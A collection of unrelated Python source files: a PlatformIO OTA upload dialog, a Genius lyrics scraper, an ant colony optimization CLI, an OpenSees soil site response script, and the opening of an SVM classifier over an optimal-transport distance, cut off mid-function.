furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================================================
The upload dialog (OTA) is shown after the build process. In the upload dialog
it is possible to set up the configuration for your own Pixelix device, such as
its IP address.
"""
import tkinter as tk
import json
# pylint: disable=undefined-variable
Import("env") # type: ignore
class UploadModel():
    """The upload model provides access to the OTA configuration data
    (ip-address, port, password), persisted as JSON on the filesystem.
    """
    def __init__(self, file_name):
        self._filename = file_name
        self._data_json = self._load(self._filename)
        self._default_ip_address = "192.168.x.x"
        self._default_port = 3232
        self._default_password = "<PASSWORD>"
        # fall back to defaults when no configuration file exists yet
        if self._data_json is None:
            self._setup_model()
    def _load(self, file_name):
        """Read the JSON configuration; returns None if the file is missing."""
        data_json = None
        try:
            with open(file_name) as json_file:
                data_json = json.load(json_file)
        except FileNotFoundError:
            pass
        return data_json
    def _save(self, file_name):
        """Write the JSON configuration; silently skips an unwritable path."""
        try:
            with open(file_name, "w") as json_file:
                json.dump(self._data_json, json_file, indent=4)
        except FileNotFoundError:
            pass
    def _setup_model(self):
        """Initialize the in-memory configuration with default values."""
        self._data_json = dict()
        self._data_json["ipAddress"] = self._default_ip_address
        self._data_json["port"] = self._default_port
        self._data_json["password"] = self._default_password
    def load(self):
        """Load configuration from filesystem.
        """
        self._load(self._filename)
    def save(self):
        """Store configuration in filesystem.
        """
        self._save(self._filename)
    def get_ip_address(self):
        """Get ip-address of remote device.
        Returns:
            str: IP-address
        """
        ip_address = self._default_ip_address
        if self._data_json is not None:
            if "ipAddress" in self._data_json:
                ip_address = self._data_json["ipAddress"]
        return ip_address
    def set_ip_address(self, ip_address):
        """Set ip-address of remote device.
        Args:
            ip_address (str): IP-Address
        """
        self._data_json["ipAddress"] = ip_address
    def get_port(self):
        """Get port for remote update.
        Returns:
            int: Port number
        """
        port = self._default_port
        if self._data_json is not None:
            if "port" in self._data_json:
                port = self._data_json["port"]
        return port
    def set_port(self, port):
        """Set port for remote update.
        Args:
            port (int): Port number
        """
        self._data_json["port"] = port
    def get_password(self):
        """Get password for remote access.
        Returns:
            str: Password
        """
        # BUGFIX: this line was the bare placeholder `<PASSWORD>` (a SyntaxError);
        # fall back to the configured default, mirroring get_ip_address/get_port.
        password = self._default_password
        if self._data_json is not None:
            if "password" in self._data_json:
                password = self._data_json["password"]
        return password
    def set_password(self, password):
        """Set password for remote access.
        Args:
            password (str): Password
        """
        self._data_json["password"] = password
class App(tk.Tk):
    """The main application class, which represents the main window of the
    OTA upload dialog. On a confirmed upload it writes the chosen parameters
    into the PlatformIO environment; on abort the platform.ini values stand.
    """
    def __init__(self, *args, **kwargs):
        tk.Tk.__init__(self, *args, **kwargs)
        self._upload_model = UploadModel("upload.json")
        # Tk variables backing the three entry widgets
        self._ip_address = tk.StringVar()
        self._port = tk.IntVar()
        self._password = tk.StringVar()
        # stays True unless the user explicitly presses "Upload"
        self._is_aborted = True
    def _update_gui(self):
        """Push the model values into the Tk variables (model -> GUI)."""
        self._ip_address.set(self._upload_model.get_ip_address())
        self._port.set(self._upload_model.get_port())
        self._password.set(self._upload_model.get_password())
    def _update_model(self):
        """Pull the Tk variable values back into the model (GUI -> model)."""
        self._upload_model.set_ip_address(self._ip_address.get())
        self._upload_model.set_port(self._port.get())
        self._upload_model.set_password(self._password.get())
    def _setup_gui(self):
        """Build the dialog widgets and wire up the window callbacks."""
        self.title("Upload Utility")
        frame = tk.Frame(self)
        label_ip_address = tk.Label(frame, text="IP-Address:", anchor="w")
        input_ip_address = tk.Entry(frame, textvariable=self._ip_address)
        label_port = tk.Label(frame, text="Port:", anchor="w")
        input_port = tk.Entry(frame, textvariable=self._port)
        label_password = tk.Label(frame, text="Password:", anchor="w")
        input_password = tk.Entry(frame, textvariable=self._password, show="*")
        label_ip_address.pack(fill="x", expand=False)
        input_ip_address.pack(fill="x", expand=True)
        label_port.pack(fill="x", expand=False)
        input_port.pack(fill="x", expand=True)
        label_password.pack(fill="x", expand=False)
        input_password.pack(fill="x", expand=True)
        button_upload = tk.Button(frame, text="Upload", command=self._on_upload)
        button_upload.pack(fill="x", expand=False)
        frame.pack(fill="x", expand=True, padx=20, pady=20)
        self._update_gui()
        self.update()
        self.minsize(frame.winfo_width(), frame.winfo_height())
        # BUGFIX: was `lambda: self.quit() and self.close()` — quit() returns
        # None, so the (nonexistent) close() was never called; closing the
        # window should simply stop the main loop, leaving _is_aborted True.
        self.protocol("WM_DELETE_WINDOW", self.quit)
    def run(self):
        """Run the main application.
        """
        self._setup_gui()
        self.mainloop()
        self._update_model()
        if not self._is_aborted:
            # hand the confirmed OTA parameters to PlatformIO
            env.Replace(  # type: ignore
                UPLOAD_PORT=self._upload_model.get_ip_address(),
                UPLOAD_FLAGS=["--port=" + str(self._upload_model.get_port()), "--auth=" + self._upload_model.get_password()]
            )
        else:
            print("Aborted. Using upload parameters from platform.ini")
    def _on_upload(self):
        """Upload button callback: persist the settings and leave the dialog."""
        self._update_model()
        self._upload_model.save()
        self._is_aborted = False
        self.quit()
def before_upload(source, target, env): # pylint: disable=unused-argument
    """Pre-upload hook: open the OTA configuration dialog before the upload starts.

    Args:
        source (SCons.Node.FS.File): Source file as file object
        target (SCons.Node.Alias.Alias): Alias object
        env (SCons.Script.SConscript.SConsEnvironment): Environment object
    """
    App().run()
# Register the upload dialog to run right before PlatformIO's "upload"
# (firmware OTA) and "uploadfs" (filesystem OTA) targets.
# pylint: disable=undefined-variable
env.AddPreAction("upload", before_upload) # type: ignore
# pylint: disable=undefined-variable
env.AddPreAction("uploadfs", before_upload) # type: ignore
|
<reponame>Fingolfin7/Music-Metadata-and-Lyrics<filename>Source/GeniusLyrics.py
import requests
import get_auth_token
from functions import remove_non_ascii
from check_internet import check_internet
from ColourText import format_text
from SongsDict import SongDict
from bs4 import BeautifulSoup
# A Genius API token is required for all online lyric lookups; fail fast at
# import time when it is missing so the user gets a clear instruction.
GENIUS_TOKEN = get_auth_token.get_token()
if GENIUS_TOKEN is None:
    print('Please create the auth_token.txt file inside the Source folder and put in a Genius Token.')
    exit()
# a class containing a dictionary with all the saved lyrics from previous searches
song_dict = SongDict()
def search_song_lyrics(song_name="", song_artist=""):
    """Find lyrics for a song, checking the local cache before Genius.com.

    The offline dictionary (song_dict) is searched first; on a miss, and when
    an internet connection is available, Genius.com is queried up to 3 times.
    Successful online results are cached for future offline lookups. If nothing
    is found, the available cached songs of the matching artist are listed.

    Args:
        song_name (str): title (or part of it) of the song.
        song_artist (str): artist name (or part of it).

    Returns:
        str or None: the lyrics text, or None if nothing was found.
    """
    def online_search():
        # use the song and artist names to search genius.com
        query = {"q": f"{song_name} {song_artist}",
                 "text_format": "plain"}
        title = ""
        artist = ""
        headers = {"Authorization": f"Bearer {GENIUS_TOKEN}"}
        base_url = "https://api.genius.com/"
        # get the results as a json file (use base_url consistently for all API calls)
        data = requests.get(f"{base_url}search/", params=query, headers=headers).json()
        found_song = None
        # searches the returned hits
        for hit in data['response']['hits']:
            # compare the returned song title and artist name to the function arguments
            result_title = str(hit['result']['title']).lower() + str(hit['result']['primary_artist']['name']).lower()
            if result_title.find(song_artist.lower()) != -1 or result_title.find(
                    song_name.lower()) != -1:  # if we can find the artist or song name, then we have found our song
                found_song = hit
                title = hit['result']['title_with_featured']
                artist = hit['result']['primary_artist']['name']
                print(format_text(f"Found: [bright yellow][italic]'{title}' by '{artist}'[reset]"))
                break
        if found_song is None:  # no hit matched
            return None
        song_id = found_song['result']['id']  # get the song's id
        # search genius for the song using it's id and get the 'path' to the document containing the song's lyrics
        song_data = requests.get(f"{base_url}songs/{song_id}", headers=headers).json()
        path = song_data['response']['song']['path']
        # use beautifulsoup to scrape the lyric page for just the song lyrics
        page = requests.get(f"http://genius.com{path}")
        html = BeautifulSoup(page.text, "html.parser")
        # remove script tags that they put in the middle of the lyrics
        for tag in html(['style', 'script']):
            tag.extract()
        # Genius wraps lyrics in a div with class 'lyrics'; find() returns None when
        # the page layout differs. BUGFIX: this case was previously hidden behind a
        # bare `except:` that also silently swallowed cache-save errors.
        lyrics_div = html.find('div', class_='lyrics')
        if lyrics_div is None:
            return None
        scraped_lyrics = lyrics_div.get_text()
        # save to the dictionary object. These can then be retrieved later on for an offline search
        song_dict.save_to_dict(remove_non_ascii(artist), remove_non_ascii(title), scraped_lyrics)
        song_dict.save_dict()
        return scraped_lyrics
    # offline search. search the dictionary object for song lyrics
    def offline_search():
        for artist_key in song_dict.dict:  # loop through artists
            if artist_key.lower().find(song_artist.lower()) != -1:  # if artist name is found in key
                for song in song_dict.dict[artist_key]:  # loop through song keys in artist dict
                    if song.lower().find(song_name.lower()) != -1:  # if a song name is found in song key
                        print(format_text(f"Found: [bright yellow][italic]'{song}' by"
                                          f" '{artist_key}'[reset]"))
                        return song_dict.dict[artist_key][song]
        return None
    # first try an offline search
    song_artist = remove_non_ascii(song_artist)
    song_name = remove_non_ascii(song_name)
    # BUGFIX: the result used to be bound to the name `offline_search`, shadowing
    # the function itself; use a separate name for the cached lyrics.
    cached_lyrics = offline_search()
    if cached_lyrics is not None:
        return cached_lyrics
    # if nothing is found, and there is an internet connection, do an online search
    if check_internet():
        count = 0
        print(format_text("Searching [italic][bright yellow]Genius.com[reset] for lyrics"))
        while count < 3:  # Try online search 3 times before giving up
            value = online_search()
            if value is None:
                print(format_text(f"[italic][bright red]Try {count + 1} failed.[reset]\n"))
                count += 1
            else:
                return value
    # if nothing was found from the offline and online searches
    print(format_text(f"Lyrics for [bright yellow][italic]'{song_name}' by '{song_artist}'[reset] not found.\n"))
    # if the song isn't found, search for the artist and print a list of the available song lyrics
    for artist_key in song_dict.dict:
        if artist_key.lower().find(song_artist.lower()) != -1:
            print(format_text(f"Songs from [bright yellow][italic]{artist_key}[reset]"))
            for index, found_song in enumerate(song_dict.dict[artist_key], start=1):
                print(format_text(f"[bright yellow][italic]{index}. {found_song}[reset]"))
            print()
    return None
def main():
    """Demo entry point: clear the console, look up a known song and show it."""
    import os
    os.system("cls")
    lyrics = search_song_lyrics("Take Care", "Drake")
    print(lyrics)
    input()
# Run the demo lookup only when executed directly, not when imported.
if __name__ == "__main__":
    main()
|
<reponame>DreamBoatOve/aia_eis<filename>v0/aia_eis_v0/goa/swarm_based/ant_colony/learning_examples/acopy/acopy/cli.py
# -*- coding: utf-8 -*-
"""Console script for acopy."""
import time
import random
import click
from . import ant
from . import solvers
from . import plugins
from . import utils
def solver_options(f):
    """Decorator that attaches the common ACO solver options to a click command.

    Applied bottom-up by click, so the options appear in --help in reverse of
    the order below. Returns the decorated command function unchanged.
    """
    click.option('--seed',
                 type=str,
                 default=None,
                 help='set the random seed')(f)
    click.option('--plot',
                 default=False,
                 is_flag=True,
                 # BUGFIX: typo "interation" -> "iteration"
                 help='enable pretty graphs that show iteration data (you '
                      'must have matplotlib and pandas installed)')(f)
    click.option('--darwin',
                 default=0.0,
                 help='sigma factor for variation of the alpha/beta settings '
                      'for ants between iterations')(f)
    click.option('--flip',
                 type=int,
                 default=None,
                 help='seconds between periodic inversions of the pheromone '
                      'levels on all edges, meaning the edges with the least '
                      'pheromone will have the most and vice versa')(f)
    click.option('--threshold',
                 type=float,
                 default=None,
                 help='solution value below which the solver will stop')(f)
    click.option('--reset',
                 type=int,
                 default=False,
                 help='seconds between periodic resets of the pheromone '
                      'levels on all edges')(f)
    click.option('--elite',
                 default=0.0,
                 help='how many times the best solution is re-traced')(f)
    click.option('--limit',
                 default=2000,
                 show_default=True,
                 help='maximum number of iterations to perform')(f)
    click.option('--ants',
                 type=int,
                 default=None,
                 help='number of ants to use (defaults to number of nodes)')(f)
    click.option('--top',
                 type=int,
                 default=None,
                 help='number of ants that deposit pheromone (defaults to '
                      'all)')(f)
    click.option('--q',
                 default=1.0,
                 help='amount of pheromone each ant has')(f)
    click.option('--rho',
                 default=0.03,
                 help='rate of pheromone evaporation')(f)
    # BUGFIX: the alpha/beta help strings were swapped — in ACO alpha weighs
    # pheromone and beta weighs distance (heuristic) information.
    click.option('--beta',
                 default=3.0,
                 help='how much distance matters')(f)
    click.option('--alpha',
                 default=1.0,
                 help='how much pheromone matters')(f)
    return f
def run_solver(graph, alpha, beta, rho, q, limit, top, ants, seed,
               plugin_settings):
    """Build a colony and solver, register the requested plugins, and solve
    *graph*, optionally plotting recorded per-iteration stats afterwards."""
    if plugin_settings.get('plot') and not utils.is_plot_enabled():
        raise click.UsageError('you must install matplotlib and pandas to '
                               'use the --plot option')

    seed = seed or str(hash(time.time()))
    click.echo(f'SEED={seed}')
    random.seed(seed)

    colony = ant.Colony(alpha=alpha, beta=beta)
    solver = solvers.Solver(rho=rho, q=q, top=top)
    click.echo(solver)

    def register(plugin):
        # Announce and attach a plugin (same message the original emitted).
        click.echo(f'Registering plugin: {plugin}')
        solver.add_plugin(plugin)

    timer = plugins.Timer()
    register(plugins.Printout())
    register(timer)

    # Optional plugins, each enabled only when its CLI setting is truthy.
    # Registration order matches the original hand-written sequence.
    optional_plugins = (
        ('darwin', lambda value: plugins.Darwin(sigma=value)),
        ('elite', lambda value: plugins.EliteTracer(factor=value)),
        ('reset', lambda value: plugins.PeriodicReset(period=value)),
        ('flip', lambda value: plugins.PheromoneFlip(period=value)),
        ('threshold', lambda value: plugins.Threshold(value)),
    )
    for key, make_plugin in optional_plugins:
        value = plugin_settings.get(key)
        if value:
            register(make_plugin(value))

    recorder = None
    if plugin_settings.get('plot'):
        recorder = plugins.StatsRecorder()
        register(recorder)

    solver.solve(graph, colony, gen_size=ants, limit=limit)
    click.echo(timer.get_report())

    if recorder:
        utils.plot.Plotter(recorder.stats).plot()
@click.group()
def main():
    """Top-level CLI group; warns once when plotting support is unavailable."""
    if utils.is_plot_enabled():
        return
    warning = click.style('warning: plotting feature disabled', fg='yellow')
    click.echo(warning)
@main.command(short_help='run the demo')
@solver_options
def demo(alpha, beta, rho, q, limit, top, ants, seed, **plugin_settings):
    """Run the solver against the 33-city demo graph."""
    demo_graph = utils.data.get_demo_graph()
    run_solver(demo_graph, alpha, beta, rho, q, limit, top, ants, seed,
               plugin_settings)
@main.command(short_help='use the solver on a graph')
@solver_options
@click.argument('filepath',
                type=click.Path(dir_okay=False, readable=True))
@click.option('--format',
              default='json',
              type=click.Choice(utils.data.get_formats()),
              show_default=True,
              metavar='FORMAT',
              # Bug fix: the original f-string referenced the undefined name
              # `global_optimizations.swarm_based...`, which raises NameError
              # at import time; the intended call is utils.data.get_formats(),
              # the same source used for click.Choice above.
              help='format of the file containing the graph to use; choices '
                   f'are {", ".join(utils.data.get_formats())}')
def solve(alpha, beta, rho, q, limit, top, ants, filepath, format, seed,
          **plugin_settings):
    """Use the solver on a graph in a file in one of several formats."""
    try:
        graph = utils.data.read_graph_data(filepath, format)
    except Exception:
        raise click.UsageError(f'failed to parse {filepath} as {format}')
    run_solver(graph, alpha, beta, rho, q, limit, top, ants, seed,
               plugin_settings)
# Allow running this module directly (`python cli.py`) in addition to the
# installed console-script entry point.
if __name__ == "__main__":
    main()
|
<gh_stars>0
import eqsig
from collections import OrderedDict
import numpy as np
import sfsimodels as sm
import o3seespy as o3
def site_response(sp, asig, linear=0):
    """
    Run seismic analysis of a soil profile - example based on:
    http://opensees.berkeley.edu/wiki/index.php/Site_Response_Analysis_of_a_Layered_Soil_Column_(Total_Stress_Analysis)

    :param sp: sfsimodels.SoilProfile object
        A soil profile
    :param asig: eqsig.AccSignal object
        An acceleration signal
    :param linear: int
        If truthy, the soil is modelled as linear elastic; otherwise the
        nonlinear PressureIndependMultiYield model is used.
    :return: dict
        Time vector, surface acceleration recording and element stress
        recordings.
    """
    osi = o3.OpenSeesInstance(ndm=2, ndf=2, state=3)
    assert isinstance(sp, sm.SoilProfile)
    # Split the profile into sub-layers and pull out the per-layer properties.
    sp.gen_split(props=['shear_vel', 'unit_mass', 'cohesion', 'phi', 'bulk_mod', 'poissons_ratio', 'strain_peak'])
    thicknesses = sp.split["thickness"]
    n_node_rows = len(thicknesses) + 1
    node_depths = np.cumsum(sp.split["thickness"])
    node_depths = np.insert(node_depths, 0, 0)
    shear_vels = sp.split["shear_vel"]
    unit_masses = sp.split["unit_mass"] / 1e3  # scaled by 1e3 — presumably a unit conversion; confirm
    g_mods = unit_masses * shear_vels ** 2
    poissons_ratio = sp.split['poissons_ratio']
    # Bug fix: the standard isotropic elasticity relation is E = 2G(1 + v);
    # the original used (1 - v), which is only coincidentally correct when v = 0.
    youngs_mods = 2 * g_mods * (1 + poissons_ratio)
    # Use the bulk moduli supplied by the soil profile.  (The original also
    # computed bulk moduli from E and v here but immediately overwrote the
    # result with this line, so the dead computation has been removed.)
    bulk_mods = sp.split['bulk_mod'] / 1e3
    cohesions = sp.split['cohesion'] / 1e3
    phis = sp.split['phi']
    strain_peaks = sp.split['strain_peak']
    grav = 9.81
    # Rayleigh damping coefficients anchored at 0.5 Hz and 10 Hz.
    damping = 0.03
    omega_1 = 2 * np.pi * 0.5
    omega_2 = 2 * np.pi * 10
    a0 = 2 * damping * omega_1 * omega_2 / (omega_1 + omega_2)
    a1 = 2 * damping / (omega_1 + omega_2)
    # Standard (average acceleration) Newmark parameters.
    newmark_gamma = 0.5
    newmark_beta = 0.25
    ele_width = min(thicknesses)
    # Define nodes and set boundary conditions for simple shear deformation
    # Start at top and build down?
    nd = OrderedDict()
    nd["R0L"] = o3.node.Node(osi, 0, 0)  # row 0 left
    nd["R0R"] = o3.node.Node(osi, ele_width, 0)
    for i in range(1, n_node_rows):
        # Establish left and right nodes
        nd[f"R{i}L"] = o3.node.Node(osi, 0, -node_depths[i])
        nd[f"R{i}R"] = o3.node.Node(osi, ele_width, -node_depths[i])
        # set x and y dofs equal for left and right nodes
        o3.EqualDOF(osi, nd[f"R{i}L"], nd[f"R{i}R"], [o3.cc.X, o3.cc.Y])
    # Fix base nodes
    o3.Fix2DOF(osi, nd[f"R{n_node_rows - 1}L"], o3.cc.FREE, o3.cc.FIXED)
    o3.Fix2DOF(osi, nd[f"R{n_node_rows - 1}R"], o3.cc.FREE, o3.cc.FIXED)
    # Define dashpot nodes (Lysmer-style absorbing base — TODO confirm intent)
    dashpot_node_l = o3.node.Node(osi, 0, -node_depths[-1])
    dashpot_node_2 = o3.node.Node(osi, 0, -node_depths[-1])
    o3.Fix2DOF(osi, dashpot_node_l, o3.cc.FIXED, o3.cc.FIXED)
    o3.Fix2DOF(osi, dashpot_node_2, o3.cc.FREE, o3.cc.FIXED)
    # define equal DOF for dashpot and soil base nodes
    o3.EqualDOF(osi, nd[f"R{n_node_rows - 1}L"], nd[f"R{n_node_rows - 1}R"], [o3.cc.X])
    o3.EqualDOF(osi, nd[f"R{n_node_rows - 1}L"], dashpot_node_2, [o3.cc.X])
    # define materials
    ele_thick = 1.0  # m
    soil_mats = []
    # Backbone curve sampling points for the nonlinear model.
    strains = np.logspace(-6, -0.5, 16)
    ref_strain = 0.005
    rats = 1. / (1 + (strains / ref_strain) ** 0.91)
    eles = []
    for i in range(len(thicknesses)):
        if not linear:
            mat = o3.nd_material.PressureIndependMultiYield(osi, 2, unit_masses[i], g_mods[i],
                                                            bulk_mods[i], cohesions[i], strain_peaks[i],
                                                            phis[i], press_depend_coe=0.0, no_yield_surf=16,
                                                            strains=strains, ratios=rats)
        else:
            mat = o3.nd_material.ElasticIsotropic(osi, youngs_mods[i], poissons_ratio[i], rho=unit_masses[i])
        soil_mats.append(mat)
        # def element; b2 applies gravity as a body force
        nodes = [nd[f"R{i + 1}L"], nd[f"R{i + 1}R"], nd[f"R{i}R"], nd[f"R{i}L"]]
        ele = o3.element.Quad(osi, nodes, ele_thick, o3.cc.PLANE_STRAIN, mat, b2=grav * unit_masses[i])
        eles.append(ele)
    # define material and element for viscous dampers
    c_base = ele_width * unit_masses[-1] * shear_vels[-1]
    dashpot_mat = o3.uniaxial_material.Viscous(osi, c_base, alpha=1.)
    o3.element.ZeroLength(osi, [dashpot_node_l, dashpot_node_2], mats=[dashpot_mat], dirs=[o3.cc.DOF2D_X])
    # Static (gravity) analysis before the dynamic run
    o3.constraints.Transformation(osi)
    o3.test_check.NormDispIncr(osi, tol=1.0e-4, max_iter=30, p_flag=0)
    o3.algorithm.Newton(osi)
    o3.numberer.RCM(osi)
    o3.system.ProfileSPD(osi)
    o3.integrator.Newmark(osi, newmark_gamma, newmark_beta)
    o3.analysis.Transient(osi)
    o3.analyze(osi, 40, 1.)
    # for i in range(len(soil_mats)):
    #     o3.update_material_stage(osi, soil_mats[i], 1)
    o3.analyze(osi, 50, 0.5)
    # reset time and analysis
    o3.set_time(osi, 0.0)
    o3.wipe_analysis(osi)
    # o3.recorder.NodeToFile(osi, 'sample_out.txt', node=nd["R0L"], dofs=[o3.cc.X], res_type='accel')
    na = o3.recorder.NodeToArrayCache(osi, node=nd["R0L"], dofs=[o3.cc.X], res_type='accel')
    es = o3.recorder.ElementsToArrayCache(osi, elements=eles, arg_vals=['stress'])
    # Define the dynamic analysis: velocity-proportional force at the base
    # (scaled by the dashpot coefficient) models the incoming motion.
    ts_obj = o3.time_series.Path(osi, dt=asig.dt, values=asig.velocity * -1, factor=c_base)
    o3.pattern.Plain(osi, ts_obj)
    o3.Load(osi, nd["R{0}L".format(n_node_rows - 1)], [1., 0.])
    # Run the dynamic analysis
    o3.algorithm.Newton(osi)
    o3.system.SparseGeneral(osi)
    o3.numberer.RCM(osi)
    o3.constraints.Transformation(osi)
    o3.integrator.Newmark(osi, newmark_gamma, newmark_beta)
    o3.rayleigh.Rayleigh(osi, a0, a1, 0, 0)
    o3.analysis.Transient(osi)
    o3.test_check.EnergyIncr(osi, tol=1.0e-10, max_iter=10)
    analysis_time = asig.time[-1]
    analysis_dt = 0.01
    # o3.extensions.to_py_file(osi)
    while o3.get_time(osi) < analysis_time:
        o3.analyze(osi, 1, analysis_dt)
    o3.wipe(osi)
    outputs = {
        "time": np.arange(0, analysis_time, analysis_dt),
        "rel_disp": [],
        "rel_accel": na.collect(),
        'ele_stresses': es.collect()
    }
    return outputs
def run_pysra(soil_profile, asig, odepths):
    """Run a linear-elastic site response analysis with pysra and return the
    acceleration time series (in m/s2) recorded at each depth in *odepths*."""
    import pysra
    import liquepy as lq

    pysra_profile = lq.sra.sm_profile_to_pysra(soil_profile, d_inc=[0.5] * soil_profile.n_layers)
    # Should be input in g
    pysra_m = pysra.motion.TimeSeriesMotion(asig.label, None, time_step=asig.dt, accels=-asig.values / 9.8)
    calc = pysra.propagation.LinearElasticCalculator()

    # Build one acceleration recorder per requested depth and remember the
    # index of each one under a stable name.
    index_by_name = {}
    recorders = []
    for i, depth in enumerate(odepths):
        location = pysra.output.OutputLocation('within', depth=depth)
        index_by_name["ACCX_d%i" % i] = len(recorders)
        recorders.append(pysra.output.AccelerationTSOutput(location))
    outputs = pysra.output.OutputCollection(recorders)

    calc(pysra_m, pysra_profile, pysra_profile.location('outcrop', depth=soil_profile.height))
    outputs(calc)

    # Convert back from g to m/s2 and trim to the input signal length.
    return {name: outputs[index].values[:asig.npts] * 9.8
            for name, index in index_by_name.items()}
def run(show=0, export=0):
    """Build a two-layer soil profile, run the O3 site response analysis and
    (optionally) compare against a pysra linear analysis in plots.

    :param show: if truthy, plot input/surface signals, spectra and transfer
        functions (requires matplotlib, bwplot, pysra, liquepy).
    :param export: if truthy, dump the soil profile to 'ecp.json'.
    """
    # --- Layer 1: softer upper layer (vs = 160 m/s) ---
    sl = sm.Soil()
    vs = 160.
    unit_mass = 1700.0
    sl.cohesion = 58.0e3
    sl.phi = 0.0
    sl.g_mod = vs ** 2 * unit_mass
    sl.poissons_ratio = 0.0
    sl.phi = 0.0
    sl.unit_dry_weight = unit_mass * 9.8
    sl.strain_peak = 0.1  # set additional parameter required for PIMY model
    sl.xi = 0.03  # for linear analysis
    # Sanity check: g_mod/unit_mass must reproduce the intended shear velocity.
    assert np.isclose(vs, sl.get_shear_vel(saturated=False))
    soil_profile = sm.SoilProfile()
    soil_profile.add_layer(0, sl)
    # --- Layer 2: stiffer lower layer (vs = 400 m/s) starting at 9.5 m ---
    sl = sm.Soil()
    vs = 400.
    unit_mass = 1700.0
    sl.g_mod = vs ** 2 * unit_mass
    sl.poissons_ratio = 0.0
    sl.cohesion = 395.0e3
    sl.phi = 0.0
    sl.unit_dry_weight = unit_mass * 9.8
    sl.strain_peak = 0.1  # set additional parameter required for PIMY model
    sl.xi = 0.03  # for linear analysis
    soil_profile.add_layer(9.5, sl)
    soil_profile.height = 20.0
    ecp_out = sm.Output()
    ecp_out.add_to_dict(soil_profile)
    if export:
        # Dump the profile definition so it can be inspected / reloaded.
        import json
        ofile = open('ecp.json', 'w')
        ofile.write(json.dumps(ecp_out.to_dict(), indent=4))
        ofile.close()
    # Load the test input motion (halved amplitude).
    from tests.conftest import TEST_DATA_DIR
    record_path = TEST_DATA_DIR
    record_filename = 'test_motion_dt0p01.txt'
    dt = 0.01
    rec = np.loadtxt(record_path + record_filename) / 2
    acc_signal = eqsig.AccSignal(rec, dt)
    outputs = site_response(soil_profile, acc_signal, linear=1)
    tot_acc = np.sum(abs(outputs['rel_accel']))
    # Regression value pinned against o3seespy v3.1.0.11 output.
    assert np.isclose(tot_acc, 515.76262984), tot_acc  # v3.1.0.11
    resp_dt = outputs['time'][2] - outputs['time'][1]
    surf_sig = eqsig.AccSignal(outputs['rel_accel'], resp_dt)
    if show:
        lw = 0.7
        import matplotlib.pyplot as plt
        from bwplot import cbox
        bf, sps = plt.subplots(nrows=3)
        # linear analysis with pysra
        od = run_pysra(soil_profile, acc_signal, odepths=np.array([0.0, 2.0]))
        pysra_sig = eqsig.AccSignal(od['ACCX_d0'], acc_signal.dt)
        # Row 0: time histories (input, O3 surface, pysra surface).
        sps[0].plot(acc_signal.time, acc_signal.values, c='k', lw=lw)
        sps[0].plot(surf_sig.time, surf_sig.values, c=cbox(0), lw=lw)
        sps[0].plot(acc_signal.time, pysra_sig.values, c=cbox(1), lw=lw)
        # Row 1: Fourier amplitude spectra.
        sps[1].plot(acc_signal.fa_frequencies, abs(acc_signal.fa_spectrum), c='k', label='Input', lw=lw)
        sps[1].plot(surf_sig.fa_frequencies, abs(surf_sig.fa_spectrum), c=cbox(0), label='O3', lw=lw)
        sps[1].plot(pysra_sig.fa_frequencies, abs(pysra_sig.fa_spectrum), c=cbox(1), label='pysra', lw=lw)
        sps[1].set_xlim([0, 20])
        # Row 2: smoothed transfer functions (surface / input).
        h = surf_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
        sps[2].plot(surf_sig.smooth_fa_frequencies, h, c=cbox(0))
        pysra_h = pysra_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
        sps[2].plot(pysra_sig.smooth_fa_frequencies, pysra_h, c=cbox(1))
        # o3_nl_h = nl_surf_sig.smooth_fa_spectrum / acc_signal.smooth_fa_spectrum
        # sps[2].plot(nl_surf_sig.smooth_fa_frequencies, o3_nl_h, c=cbox(2))
        sps[2].axhline(1, c='k', ls='--')
        sps[1].legend()
        plt.show()
    print(outputs)
if __name__ == '__main__':
    run()
|
<filename>lib/custom_svc.py
from sklearn.svm import SVC
import numpy as np
from sklearn.base import TransformerMixin
from ot_distances import RJW_distance
import time
from scg_optimizer import NonConvergenceError
from sklearn.exceptions import NotFittedError
class InfiniteException(Exception):
    """Raised when a computed Gram matrix contains non-finite (NaN) entries."""
class NanErrorInDist(Exception):
    """Raised when a pairwise distance evaluates to NaN and always_raise is set."""
"""
The following classes are used to create a SVM classifier over the RJW distance using the indefinite kernel e^{-\gamma*RJW}
"""
class GenericSVCClassifier(TransformerMixin):
    """ GenericSVCClassifier is a sklearn compatible class.
    It computes a SVM classifier over any type of data as long as a similarity measure is defined.
    More precisely if f is a similarity measure it computes a SVM on a precomputed similarity matrix
    K=exp{-gamma*f(x,y)} for all x,y
    Attributes
    ----------
    similarity_measure : a method
        The similarity mesure between the points
    gamma : float
        The gamma parameter in the similarity matrix K=exp{-gamma*f(x,y)}
    D : ndarray
        The similarity matrix f(x,y)
    svc : the SVM classifier from sklearn
    C : float
        The C parameter of the SVM
    """
    def __init__(self,similarity_measure,C=1,gamma=1,verbose=False,always_raise=False):
        # similarity_measure: callable (x, y) -> float; always_raise: if True,
        # a NaN similarity raises NanErrorInDist instead of propagating NaN.
        self.similarity_measure = similarity_measure
        self.gamma=gamma
        self.C=C
        self.verbose=verbose
        self.D=None
        # Wall-clock time of each individual similarity evaluation (profiling).
        self.similarity_measure_time=[]
        self.infiniteExceptionOccuredInFit=False
        self.always_raise=always_raise
        # Precomputed kernel: fit/predict pass Gram matrices, not raw features.
        self.svc=SVC(C=self.C,kernel="precomputed",verbose=self.verbose,max_iter=10000000) #rbf
    def compute_similarity(self,x,y):
        """ Compute the similarity between x and y using the similarity_measure
        Parameters
        ----------
        x : an abstract object
        y : an abstract object
        Returns
        -------
        A float representative of the similarity.  May be NaN when the
        underlying solver fails to converge (unless always_raise is set,
        in which case NanErrorInDist is raised).
        """
        start=time.time()
        try:
            similarity=self.similarity_measure(x,y)
        except NonConvergenceError:
            # Solver failure: record NaN so it can be detected downstream.
